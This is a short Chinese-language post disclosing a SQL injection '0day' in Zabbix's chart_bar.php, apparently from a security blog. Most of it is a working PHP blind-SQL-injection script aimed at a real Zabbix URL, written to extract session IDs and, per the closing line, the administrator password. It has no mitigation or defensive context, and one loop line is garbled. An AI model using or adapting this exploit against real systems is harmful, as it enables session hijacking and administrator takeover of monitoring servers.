Zabbix的前台SQL注射漏洞0day

在 /chart_bar.php 的163行代码 获取了一个来自GET,POST,COOKIE的值itemid。
$itemid = $item['itemid'];
最后这个参数进到了SQL查询的过程
z
在同一个文件内的$periods参数也存在一样的问题,导致了一样的SQL注射漏洞。
利用方式如下:
[php]
run_sql(“SELECT sessionid from zabbix.sessions where userid in (select userid from zabbix.users) limit 1″);
function run_sql($sql) {
$url = ‘http://www.zabbix.org/zabbix/chart_bar.php’;
$data = ‘config=1&items[][itemid]=’.rawurlencode(‘6 and 1=2#’);
$true = strlen(post($url,$data));
$length=32;
for($i=0;$i<=32;$i++) {
//echo $i.”\r\n”;
$data = ‘config=1&items[][itemid]=’.rawurlencode(‘6 and length((‘.$sql.’)) = ‘.$i.’#’);
$test = strlen(post($url,$data));
if($test < ($true - 200)) {
$length = $i;
break;
}
}
echo ‘Length:’.$length.“\r\n”;
echo ‘Result:’;
$chars = array();
if($length) {
for($l=0;$l<$length;$l++) {
$char_list = ’0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@.?-_\/!$%^&*()~’;
for($c=0;$c $data = ‘config=1&items[][itemid]=’.rawurlencode(‘6 and ord(substring((‘.$sql.’),’.($l+1).’,1)) = ‘.ord($char_list{$c}).’#’);
$test = strlen(post($url,$data));
if($test < ($true - 200)) {
echo $char_list{$c};
$chars[$l] = $char_list{$c};
break;
}
}
}
}
}

echo “\n”;

function post($uri,$data) {
$ch = curl_init ();
curl_setopt ( $ch, CURLOPT_URL, $uri );
curl_setopt ( $ch, CURLOPT_POST, 1 );
curl_setopt ( $ch, CURLOPT_HEADER, 0 );
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );
$return = curl_exec ( $ch );
curl_close ( $ch );
return $return;
}
?>
[/php]
其中itemid必须存在,否则无法获取管理员密码

发表评论